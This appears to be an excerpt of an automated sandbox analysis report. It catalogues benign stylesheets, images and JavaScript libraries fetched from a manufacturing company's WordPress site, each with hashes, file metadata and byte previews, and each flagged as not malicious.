                                                                            SHA1:2346C40D170E6C86873551DF5083090F7606373F
                                                                            SHA-256:27D290FA02F601F8C6F4082B6E90180CE14FE2DE402833091030305C1E39E2FE
                                                                            SHA-512:C0692EFF557B67BDBAC9F6B3E30AC5E6DB67C00320951036796CAEB7F47733A06953E88115E4A915D88D55D9DE384BE0E5FC9A313A9584E047CB592F2FC43E73
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/skin-material.css?ver=17.0.3
                                                                            Preview:p{padding-bottom:1.5em}.material .wpb_content_element,.material .wpb_row{margin-bottom:1.5em}.wp-block-quote.is-large,.wp-block-quote.is-style-large{margin-bottom:1.5rem}.material .vc_row-fluid[data-column-margin=none]{margin-bottom:0}#header-space{background-color:#fff}body[data-header-color=dark] #header-space{background-color:#000}#sidebar .widget.widget_categories li,#sidebar .widget.widget_nav_menu li,#sidebar .widget.widget_pages li,#sidebar div ul li{border:none;padding:4px 0}.material #footer-outer #footer-widgets .col ul li{padding:4px 0!important;border:none}@media only screen and (min-width:1000px){body #footer-outer .row{padding:75px 0}}#page-header-wrap,.container-wrap,.material .vc_text_separator div,.ocm-effect-wrap,.page-header-no-bg,.page-template-template-portfolio-php .portfolio-items .col.span_3,.page-template-template-portfolio-php .portfolio-items .col.span_4,.portfolio-items .col,.project-title{background-color:#fff}#call-to-action .triangle{color:#fff}#footer-ou
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 300 x 300, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):40469
                                                                            Entropy (8bit):7.973927708291276
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:8951C97B4E571E7B9393872533238282
                                                                            SHA1:4742B1836CBD4B80394F5F21C8FCD8839BDB28D0
                                                                            SHA-256:C265E88115D42C67AF5D3A746619FDC63F499E991B7ED0F30FDFB18FA7FFF17B
                                                                            SHA-512:56A254F205A3B8E5FAA3726FC918B5F825305211AAE3B30FD5421E65AD7171AB9C9B0CC156B470A1FED82CDC98AEF14449EBC514D7275A55F6960318AA42CD26
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR...,...,.....y}.u....IDATx..w.eW....{.x.}9T..T..[.V...03.$7......,`.Y.`-.Z.5......0..=.........nI-.%.*W.z...N.s.=u./T..OU.[......>.......*T.P.B...*T.P...~........:...........?..?.....B...S....GLdmm.....(z,./.B.O.>.LOO{.~W)...N...~7.z..R. .........R..@.P.B.Z....>B.....z.....{..t...$I.R..rY.j5.@......m.......E)..\.._.!.P.W.P..+....8."W.\qR@.NA...N_L!.(..I.J).[m.>. .z.)....;.9)..s....B.B....o..o.\.zu...>....(.b...B...J...H.........<...c..)..4...B.-.U....I..8@"+++F..>....)..\j.V.@R!..TR....}p].....p...}.~"..$...B.......*t..p.........G...........~.......&C.zC..c..3H.....nh.a')%.R...".U.....G....(..j...|&..?....9.SJ)....!d.$...rp....>..^x..R.Z..im*.....w.....:0"......Ydii.J.....d......Y.Ee..s..D).fY.....l6.n.1..L...%....9sf......v.:/....._).Y.............mnn>.9.. .~:I..B.c.m4F5z.Ae.......Z..=..`.a..+.zl......g.y..N......R.e%.p~..V.B...t..T*...a)...0..t..K.........'A..v..m<.n...V.4...z+.V.0._.<O....m.MT+.Tk.;.g......t....G.B.n.......o.t..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 170 x 65, 8-bit colormap, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):1137
                                                                            Entropy (8bit):7.595261944363741
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:6E06CF12BD748067C4BCD9D900E6F8C9
                                                                            SHA1:1754E3D0BA766AFC0CE86EDF93F630961F9D3B8F
                                                                            SHA-256:EBD5B90D43195C8D9BB49F047E1E24AD97498DADF923C3CB652F2C2E532DBB0D
                                                                            SHA-512:B4D21351A1DAAF18B68B6D376A8729C58B4CA215DA171DDC30175B669595493B388B5F70D9215A4322616122765D1980621ED5662E956D23EFC2D8FF076D78D7
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/02/bobcat.png
                                                                            Preview:.PNG........IHDR.......A.....v+.....'PLTE...............................................tRNS.3.,..$. (...A.......IDATx...,...$$...?.w*.....;.>....F.B..-nnnnnn>...j..h. .O....%..LD./....(...#.............#.....D....9o.......!R?R..{...........T)..(..[..!....^..z.=[...R...:...."..=}..2vT"....*.....\<...^R-....Y...3..E?..3.L+.......GZ..-%+a..b..{..(...k)..*.hF3V.......J....j..L...P..u..o.5 _Z....._V..j{..}..M...#.8....H......B.'.c9*..Qu,./w..!.....-36.0.N@.Ql..S...NY.....O]........f.....m0...G..$>. ..?.Bg..eY}j.w/i...=U...o..FK^..SU.9..J5..v.+...5u..jiC..NUG.{.....SU.j3t.Q(mU.:.h...-.....6..T...L..,.....eUp....:.6....J.i9.."}u.U.h.=S.*..L...f.-4.:.v-...U.^Q..$b1:.h..):...G..U..U.*n.....]!1.\3...CM.T.a.]S.0.4.SU...JJQ.1.O.j......D.1?Q.k... ..T5.....pIU.g.&.......%U...#.UQ..V..[...a.v.....k..<wD#N.Xz..>9..aY...?..1...,..Q5.....b...M.....d_5..@..;..h......L}..l{..Z.T........7..xm....U#..8<Z.~.......T.2.dvG%..!.Y.bWU..x......ag...]s.@...j
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (8521)
                                                                            Category:downloaded
                                                                            Size (bytes):8569
                                                                            Entropy (8bit):4.806610035238828
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:D6EB1FEA5B4ED381DFA9E5232BF026F9
                                                                            SHA1:FB03CDD3F327319F6B2E5C9ADCF8519D974421D9
                                                                            SHA-256:D8654BB4DCE6DCC5993A7604141DAB13D86C061EA7441897426D4F61E9D13C85
                                                                            SHA-512:B072FBA510B901E8E1FAA63EB54E80A350F233EAF7703BFDBE9C3A5AC463122E844AF949243D9352673D7AEC47F0584656A1C52E6AA917E40EB7C7CFADF4117B
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://mktg.rocklandmfg.com/acton/content/form_flattener.css
                                                                            Preview:.ao-form .ao-recaptcha-error{border:1px solid #ff0000;padding:5px}.ao-form .ao-recaptcha-error-robot-message{width:316px;text-align:left;color:#ff0000;display:none}.ao-form .ao-recaptcha-error-wrapper{width:304px;height:78px}.ao-form .ao-recaptcha-wrapper{display:inline-block}.ao-form img:not([width]){max-width:100%}.ao-form input{border:1px solid #ccc}.ao-form input:not([type="radio"]):not([type="checkbox"]){width:100%;display:block;box-sizing:border-box;border-radius:2px;padding:5px}.ao-form select{width:100%;display:block;border-style:solid;box-sizing:border-box;border:1px solid #ccc;padding:5px;border-radius:0;-webkit-appearance:none;-moz-appearance:none;-ms-user-select:none;background-image:url("Down_Arrow.svg");background-position:calc(100% - 12px);background-size:auto;background-repeat:no-repeat}.ao-form select::-ms-expand{display:none}.ao-form textarea{width:100%;display:block;box-sizing:border-box;resize:vertical;height:75px;line-height:1.5;padding:5px;border-style:solid}.ao-f
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 170 x 65, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):728
                                                                            Entropy (8bit):7.533821071757541
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:BD2E922760D43351C435CCECDA16214A
                                                                            SHA1:C2F9926846F5E0507BCBEBDB9372C9AFC338DEDC
                                                                            SHA-256:C66B8478454FBDA7677F25248FBF2BD72E2C5DC48CB31A2A18EFDD1B6E450144
                                                                            SHA-512:1C211D04D4054EF30764732FC30CD069AC43748FFC2ACE691D621524B3C4AEB27F03804DDD190176E969D6753EDF79EA7C0AD3EEE0C2340B782A9BED43B1C2BD
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR.......A.....v+......PLTE...888999999999999999999:::999ihY.....tRNS..'....-3!......_IDATx..[.. .D........c.,..3.......T@:i.. .. .. ..7R.K.....j-.....U.L..r.'\3M.Z2.lH.(...}.B....:p4..@.4.l,...i.x..~......=M.)U..-....xA.,"g.."...6..."..Q.d.xLG.3.(+$"|..d..|.K....T.I....X.g.)....:..r.h..&..Pi.9..R.7.9uaEAe..J....j.."....h....V(...f.....;..K-pk/xK.N...1..MUr..TH..J.Y.YV..w..v...Tqn..'0......:=....V...C.....j.#.V0.[R.9dm.X>.J.6..v..8...../..._..4\.....a.R!..*|j.~.0up.*6.^E.I.,b8d...?...l..'.....T....2...j_..+.0.X.6.~.*p...C..O.X.q .NX..&..:;A..e...h+.!..^....`.P.@j..#....1%(E.5...T;tu..[.S......}'.Y..9.Tp.q.6.w.U..m{..},...F...)\.A..R....V..y..Z!..2. .. .. ......CB.......IEND.B`.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (4826), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4826
                                                                            Entropy (8bit):5.804937097082267
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:190FBE4F1D70F7D3A71408C47EEF7030
                                                                            SHA1:3E791A7C04D26F09F2972B6CA2841D01389B7DBD
                                                                            SHA-256:D46129F0AA078446CC81E2D3F35CAF39A71A7FF8A8DAC3B4FFFD2DC677772736
                                                                            SHA-512:82E64595224428727410AE936B8CBE199716C7BAF5F64B5767595D5C2B8F46D4F5826557FA17A3221EA7D894A64543876E8F5976A07A4657733E2031BEFE6857
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(b,a,c){if(b==Array.prototype||b==Object.prototype)return b;b[a]=c.value;return b};function k(b){b=["object"==typeof globalThis&&globalThis,b,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var a=0;a<b.length;++a){var c=b[a];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} var m=k(this),n=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",q={},t={};function u(b,a,c){if(!c||b!=null){c=t[a];if(c==null)return b[a];c=b[c];return c!==void 0?c:b[a]}} function v(b,a,c){if(a)a:{var d=b.split(".");b=d.length===1;var e=d[0],g;!b&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;a=a(c);a!=null&&(b?h(q,d,{configurable:!0,writable:!0,value:a}):a!==c&&(t[d]===void 0&&(b=Math.random()*1E9>>>0,t[d]=n?m.Symbol(d):"$jscp$"+b+"$"+d),h(g,t[d],{co
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):2442
                                                                            Entropy (8bit):7.818482678848861
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:7E6963B0E7DFC48BAD0F23A528AD3345
                                                                            SHA1:AA8EF3C8F0E6D1FDDC8E168BD73A3194FE0B5CD3
                                                                            SHA-256:52B672F32EF4F1AF8364FDB60F83B79065842163E1647B833AEF5D477308673F
                                                                            SHA-512:89C35C1F569302B2B6A1A35C61BAFFD482155CB9A0ECA927D148782E4A6FE3C287273394FAC2D864FDA206D4112B3B6B8BA8DEFB8DDE54E3432D15BD887932C6
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/12/ROCK-MobileIcon.png
                                                                            Preview:RIFF....WEBPVP8Lu.../WB...`.m..s.S_.!.m..._@..0.l#.................3..WW.ZUU.GA.6R.....1.....H...)..o.......CUt.*.'...'5.*@*.@.$.QTh........4W..i#.?..$..D.r...pn2cD...m+.m...........j..V).9.3...`._e_......[l..-..V..:.F.d.v.....^*.......%...E.t.e.d...Ri..^...........O....$R..o.9.F.+..K.....h...... ..xB.A...d... ...$...e].......NH."Wm]....L.qO.......8...............O.X..t..*..............yluP..?p.....vlu4..{03.m.e/i....)./......-.R..d=........U..........a.....K..GFTUg }qw..TU.#`/.B......^RU..VU..`/.B..u........{...x..j.W..4..QU......>../...!...=......:...+lU.....?.....u.c......?....`=...0R.t....W..9q.....U.../{0.cfoi.>.;.2.....=......c.?{...A..W.a....J.F{....-U....z,U.`......5...T.cHmi..s...c...8..5..B..KUw|M..HU..F.^.%=...*..FX.6.....s.RU.Hr&.EN...LCmKg.. .....UUw.q[Z..<.C%......nn.B.C?ts.*....pN>...:..........L.](.....]..W..B..._.sK+.%..k...f{...! .&..H+......`......^)\).V.J......{v.x..[Z.+.^.%])..L.J..U.W...K.R.9..bK.t..K8.+..)\).V.J......[
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 1920 x 805, 8-bit/color RGB, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):2600381
                                                                            Entropy (8bit):7.998656298949276
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:D2F2CD2DECFBD70338B22C1DDED0EEE0
                                                                            SHA1:8329170CB764018ACAAAA68E76465A57D5302B9F
                                                                            SHA-256:69712ED1E3E74D4FFBBE5DB847578D11CD7C908B613F46263A7DD48394BF96D6
                                                                            SHA-512:E397AF66CD05FE23F70DBE81C39447722F9886A1B8FFB7564D679E0839FA165E7B375616CABB878DBFAD494CA5CB0D3D500CE54AE60EF61C72DBD793A43BA7D7
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR.......%......^y..'..IDATx.,W.r.Iv.,.U...h.A..04343.5..n."$=Hz..I.z.......!E.B..8\..@...F{W]6+..Ts.DGwW..{.=.\......$..[...z..(b.0.6..z.p.....D.,j.(n_..'..zc......14..lTd.\.....\X..).E..7uk....M5.....N..U.H"..g.~.J.i...{..N.Y......CU....V.j..d.8......".....M.P....D..HW..r.QU%2./>w../...uo:...4...x`.j....n.*w7..g....8..MW.y4.\./.f...rV.y).}gk.l[..._w..'+....x|rv..p..E.A..m....f..G..u.z<...X.......],~}.!.6K..UJ...<5G...no.D.I5U.w...-......_,.......k.....$...h.h0j...L....Z.GA..+X.vsm..G&..~g:...4.....t..j...%.TU.Y...**!.n.};\$.r.........z...C[.....Ja{.Aum6....K4......Og.L.<|P.;q.I...;.F%.$,.D..@.j.V....o..Yko.`oWD,a.M....Z...i.?...........N.........]JRZ..[..Z.....P..B....N.....o.V.9.{q.X....h.sI._w...+$b9...N?..........9.".Z....|..^..a"L.$......_.x....FM0.-=CW...FM.........R.aZ......i.zpx..Q..?n.|...n..6.....LMf.W.4G.,..,.......oG.+.r.....%)Xz.*.K.v.i)r.0..b.h.B.......QJ.....8..<5..z.Vp.....x{|.$is.+.X...n:..;w.<z@X.../
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):430
                                                                            Entropy (8bit):7.474347553163768
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:5DA188EE06D8A10CCAA14661F4482EF0
                                                                            SHA1:36D6B121C6A4EACF545D9AA633D5F8ED5F309726
                                                                            SHA-256:4B197B82338CA2418AEC8AFBF8286B1FC8953F530F8691D30B9A23EA8EC4835B
                                                                            SHA-512:0BF772FB30B37E167A88F24AF260C84309F110D4BE12C0A56C6322CAD13115BDDFE77C72DBA87B25D3BBFB34AFC1D8EC89CDC9E02FC85A645914A25D38F67F63
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/09/dozer-dark.png
                                                                            Preview:RIFF....WEBPVP8L..../c....`.m...P.?..0...o(..e.m.....GY..dh.wId.......;..6I.h..=. .Cd.....$.........\=e.......;...../.ED._...?...0.D.X.2>.^%\|.u.g&.*.........>.Pf..Q....4D.2a.&..D<8.H..F.0.&l...v...,$K..I.u........U.O......Zv.7.....l..q.6J\....O_%.....8..C..?.t.]^...ia=.fVU..&..]......G.V...:..EUm...L3U...K.q.c.]=h..]....i.},...u@g...p.z ...=la.....X.}.b:v.z...(....P..[....T...Z.p...v.....?.r..-.Z..^..Vn..w...8.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1434), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1434
                                                                            Entropy (8bit):5.766466434975035
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:9CC048508CA799E21AABA9E16E422C2A
                                                                            SHA1:6AFE4651C8EADA7CA6B1543ABA3E099633C4712E
                                                                            SHA-256:B2522C89AFA883BEF0AF1E6041EDC46545C40C83ECBF6315FFB46F1C4D6E54BD
                                                                            SHA-512:AC56BB358B09A2B454A39D0FA059408615F3AF8DDD0ABE6A4AD6AA84BFF39B3025AECB4E804B815E6358CFC11AF04FC0F62BD92F68B2CB0A715D730DF116EC96
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (8999), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8999
                                                                            Entropy (8bit):5.0596643810577016
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:900BAD1DBD9B131A99F31703A66340F3
                                                                            SHA1:CA580144BE55DABAE951A984529A5250D279B129
                                                                            SHA-256:3C9EB9BB1076BBB11745885964334DF870BF7EB621DAA5E7475A9A5CF4B2E424
                                                                            SHA-512:D0CF2C673096B76E4018A4A7F2B900570BA0094116E69BA4528B96E27F5339CD20A1CCD68ADBBA0F1E1D854CFF08A7EA10605D75D04AC5BE3E2F8CD1DA04A552
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:!function(){"use strict";var t=0,e={};function i(o){if(!o)throw new Error("No options passed to Waypoint constructor");if(!o.element)throw new Error("No element option passed to Waypoint constructor");if(!o.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+t,this.options=i.Adapter.extend({},i.defaults,o),this.element=this.options.element,this.adapter=new i.Adapter(this.element),this.callback=o.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=i.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=i.Context.findOrCreateByElement(this.options.context),i.offsetAliases[this.options.offset]&&(this.options.offset=i.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),e[this.key]=this,t+=1}i.prototype.queueTrigger=function(t){this.group.queueTrigger(this,t)},i.prototype.trigger=function(t){this.enabled&&this.callback
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (30856)
                                                                            Category:downloaded
                                                                            Size (bytes):31019
                                                                            Entropy (8bit):4.746774885162298
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:3552DB2D88EE5E8FFA9D8B32189503D9
                                                                            SHA1:525284663FD1DFAEAC860F97A359CECA08ADADDF
                                                                            SHA-256:FE04392DF7A777C03062DC887D4937FFA2D8F439EFD6BC125E7584CBD292AB9C
                                                                            SHA-512:C6B9FBFC37C49A3E140E18F767C20112D1B7CED109452E9E65160C8631AC3A06651F77B895C387298E189103797B8EF35BE8938062E33BC8B8EA9BFF5E004485
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/woo-product-slider/src/Frontend/assets/css/font-awesome.min.css?ver=2.8.2
                                                                            Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';font-display: swap;src:url('../fonts/fontawesome-webfont.eot?v=4.7.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 170 x 65, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):644
                                                                            Entropy (8bit):7.502711344521806
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:34618C44F7E6BAF3CFB19B6716820060
                                                                            SHA1:19BAFEAE6FA516C07EF39779E3A5A92F81DD28E3
                                                                            SHA-256:31DA032B66F7F2F58F531CB4A7AC0DFA50971186AD6ABF98A069115BFBF84370
                                                                            SHA-512:15FE92FF56E397594CFC34F88B841082CB8833A184006CA34190EC1E2C9899B8147691449F8AFA2BCAAAB38B840EFD73C3E622CA74A0671349D19021C4D79219
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR.......A.....v+.....*PLTE...]]]TTTNNNFFF@@@777111)))"""............q.......tRNS........."%(-3p..`....IDATx..... ..`...Az..m+..5n...vvf.].......B.!..B..V1.<.&[#.c........6DTd.-......Hjv.a...)..l......4..M.F^U...E....E...3....k.0.mQ..$....r..:...o.]M..'..&...H...IQ......D.E.5v5.G....P...Y.I.....vfTVS.P.?.*ySM{K.....F.ym.0....B.....d.8.G..g..!.~.......?E.x>*..w.N.}....OG~...~............Hj.o..q.......x..T...m..2nv.....Ie.2*..$..&....Y=o.u...v.0*...j....pe.K..............l..H..WFe]*y,(6.f.r....WFEC.w..l.........h.......5:...2oS=i..U1.. ...r|......F.....].!..B._.7%.s.,.......IEND.B`.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (3178), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):3178
                                                                            Entropy (8bit):5.033375019981445
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:71B5288425CE5605BC3990E7F5F6FC7C
                                                                            SHA1:3E014D2C90093CE476682045C2F61B76840A1C80
                                                                            SHA-256:B3241E8EEDAD3697018639715ACEE69FB5B06B1C9B39646BE0F45A240A0D3FFC
                                                                            SHA-512:9D31E7078893BA03ECCECF2ADC73A585582230E82E8CFBEDBBAEF3ECCA58C9EC72FD2A1EC471FDDE058466AF4E7F13A0CC51BCBBA1290D2E0E526D4A7DE41222
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:function focus_populate_live_region(){var e=["woocommerce-message","woocommerce-error","wc-block-components-notice-banner"].map(function(e){return"."+e+'[role="alert"]'}).join(", "),o=document.querySelectorAll(e);if(0!==o.length){var t=o[0];t.setAttribute("tabindex","-1");var n=setTimeout(function(){t.focus(),clearTimeout(n)},500)}}function refresh_sorted_by_live_region(){var e=document.querySelector('.woocommerce-result-count[data-is-sorted-by="true"]');if(e)var o=e.innerHTML,t=setTimeout(function(){e.innerHTML="",e.innerHTML=o,clearTimeout(t)},1e3)}function on_document_ready(){focus_populate_live_region(),refresh_sorted_by_live_region()}jQuery(function(e){e(".woocommerce-ordering").on("change","select.orderby",function(){e(this).closest("form").trigger("submit")}),e("input.qty:not(.product-quantity input.qty)").each(function(){var o=parseFloat(e(this).attr("min"));o>=0&&parseFloat(e(this).val())<o&&e(this).val(o)});var o="store_notice"+(e(".woocommerce-store-notice").data("noticeId")
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):22716
                                                                            Entropy (8bit):7.959035424416643
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:3B63379FC2012844E272CED39F967E9A
                                                                            SHA1:10BCC567C12979DCFC5B194E1683EA916D2AAF5D
                                                                            SHA-256:C15E5E4D4CE3E7871ACA46FF86CAF185062F483D2A47243B864D41239DE99B7A
                                                                            SHA-512:0341D29A6274594078B26C5E185B5090A7457C74F5919AD468636B2801CEBDA91F9CD0F22C13E1AF8313145C0A8E81960B113366951AD623211154F5EDB50C66
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2022/09/West_Coast_Style_Rollout_Closed-300x300.png
                                                                            Preview:RIFF.X..WEBPVP8L.X../+.J.MH.$9l....3......A.vo..........m.l@_........xJ.H.4^...N.cl...1l(..$0..KR.Hr..M...1..RF.{..z..8W].2....,Is.(.S..<..$I.;..`.H.sN...>...S.."b.o.K,...RD.*.t#U.....2.NU.V...{....@.i.ZO.......Z+.=.8.......]e.......l..g-..?.t!.m.VZ/.{....:C.......omm]m....28.m+O...O*..|J......a...$E...r.Jkq...O-..._.F.#.$I..O../x...e...I...&....5.m.O.9y..p....2$D.......).G.+..;8.f...)!$!..T....h...8...$.....P..B...%.jYrk...')!..W......... ...\...i.....Vq:QR"-.fCB...B(%.....|....w#r.)!............H.>"n@!.)%$!..H.$o.....Z.XSh9.T!M ... ..@63.s....Z..^..#.G.....@.$....0z^..Bb..Ci.9.2e..H.8)13...=..hF...R....N+u.....U.......u.t.N............Y..l.&.A..0Q...\.D..T0..B.4cb..>...!:..... .......B...11izr......o.;......a.....!:D%.vW*.Y{.J....*L...~tR....P.j.y..7....".....}.E}........LN..x..L...J.?.......m`..".;.5.A...c0TZe/.....X...G.?..{.......qC...{.{;...CZ..G.....'.._.C.o......Qmo...[7o...9..$IUR.Q.|..y.1...V...^G7..V..,.!.......Dy.E.B.h...o.~.....$..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2620)
                                                                            Category:downloaded
                                                                            Size (bytes):2711
                                                                            Entropy (8bit):5.221876664182422
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:2A651F118ED794F9BDC86EF7EB86859A
                                                                            SHA1:044DAF3A8F2789D7B80948DCF640BB72775F9DF0
                                                                            SHA-256:C962E74A0CD768609B29C247028BD61C3229A50BB3ABE908FEEAA98962EB0971
                                                                            SHA-512:29A20F42BA55BCDE7849AA21B8A26BE89D0911CF480197557FD53C12566AB076BA56C34B789ADA36B41B679B0E5017EA2F845F767DCD0041C0F5AB1C9BB616D1
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/js/build/third-party/jquery.mousewheel.min.js?ver=3.1.13
                                                                            Preview:/*!. * jQuery Mousewheel 3.1.13. * Copyright OpenJS Foundation and other contributors. */.!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?module.exports=e:e(jQuery)}(function(u){var f,d,e=["wheel","mousewheel","DOMMouseScroll","MozMousePixelScroll"],t="onwheel"in window.document||9<=window.document.documentMode?["wheel"]:["mousewheel","DomMouseScroll","MozMousePixelScroll"],w=Array.prototype.slice;if(u.event.fixHooks)for(var i=e.length;i;)u.event.fixHooks[e[--i]]=u.event.mouseHooks;var c=u.event.special.mousewheel={version:"3.1.12",setup:function(){if(this.addEventListener)for(var e=t.length;e;)this.addEventListener(t[--e],n,{passive:false});else this.onmousewheel=n;u.data(this,"mousewheel-line-height",c.getLineHeight(this)),u.data(this,"mousewheel-page-height",c.getPageHeight(this))},teardown:function(){if(this.removeEventListener)for(var e=t.length;e;)this.removeEventListener(t[--e],n,!1);else this.onmousewheel=null;u.removeData(this,"
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):13
                                                                            Entropy (8bit):2.7773627950641693
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
